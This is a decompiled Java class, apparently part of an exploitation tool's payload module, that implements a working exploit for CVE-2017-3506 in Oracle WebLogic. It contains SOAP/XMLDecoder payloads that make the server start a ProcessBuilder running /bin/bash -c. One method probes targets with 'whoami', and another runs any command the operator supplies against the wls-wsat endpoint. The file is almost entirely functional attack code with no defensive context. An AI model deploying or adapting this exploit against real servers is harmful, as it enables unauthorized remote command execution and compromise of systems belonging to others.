package payload;

import util.HttpTool;

/* loaded from: input_file:payload/CVE_2017_3506.class */
public class CVE_2017_3506 implements BasePayload {
    private static final String CheckStr1 = "<faultstring>java.lang.ProcessBuilder";
    private static final String CheckStr2 = "<faultstring>0";
    private static final String VULURL = "/wls-wsat/CoordinatorPortType";
    private static String Check_VUL = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n  <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n     <java>\n        <object class=\"java.lang.ProcessBuilder\">\n          <array class=\"java.lang.String\" length=\"3\">\n        <void index=\"0\">\n              <string>/bin/bash</string>\n            </void>\n        <void index=\"1\">\n             <string>-c</string>\n            </void>\n        <void index=\"2\">\n              <string>whoami</string>\n            </void>\n         </array>\n       <void method=\"start\"/>\n       </object>\n      </java>\n   </work:WorkContext>\n  </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>";
    private static String VUL_CMD = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n  <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n     <java>\n        <object class=\"java.lang.ProcessBuilder\">\n          <array class=\"java.lang.String\" length=\"3\">\n        <void index=\"0\">\n              <string>/bin/bash</string>\n            </void>\n        <void index=\"1\">\n             <string>-c</string>\n            </void>\n        <void index=\"2\">\n              <string>%s</string>\n            </void>\n         </array>\n       <void method=\"start\"/>\n       </object>\n      </java>\n   </work:WorkContext>\n  </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>";

    @Override // payload.BasePayload
    public boolean checkVUL(String str) throws Exception {
        try {
            String postHttpReuestByXML = HttpTool.postHttpReuestByXML(str + VULURL, Check_VUL, "UTF-8");
            if (CheckStr1.equals(postHttpReuestByXML)) {
                return true;
            }
            return CheckStr2.equals(postHttpReuestByXML);
        } catch (Exception e) {
            throw e;
        }
    }

    @Override // payload.BasePayload
    public String exeCMD(String str, String str2, String str3) throws Exception {
        try {
            return HttpTool.postHttpReuestByXML(str + VULURL, String.format(VUL_CMD, str2), str3);
        } catch (Exception e) {
            throw e;
        }
    }

    @Override // payload.BasePayload
    public String uploadFile(String str, String str2, String str3, boolean z) throws Exception {
        return str;
    }

    @Override // payload.BasePayload
    public String getWebPath(String str) throws Exception {
        return str;
    }
}
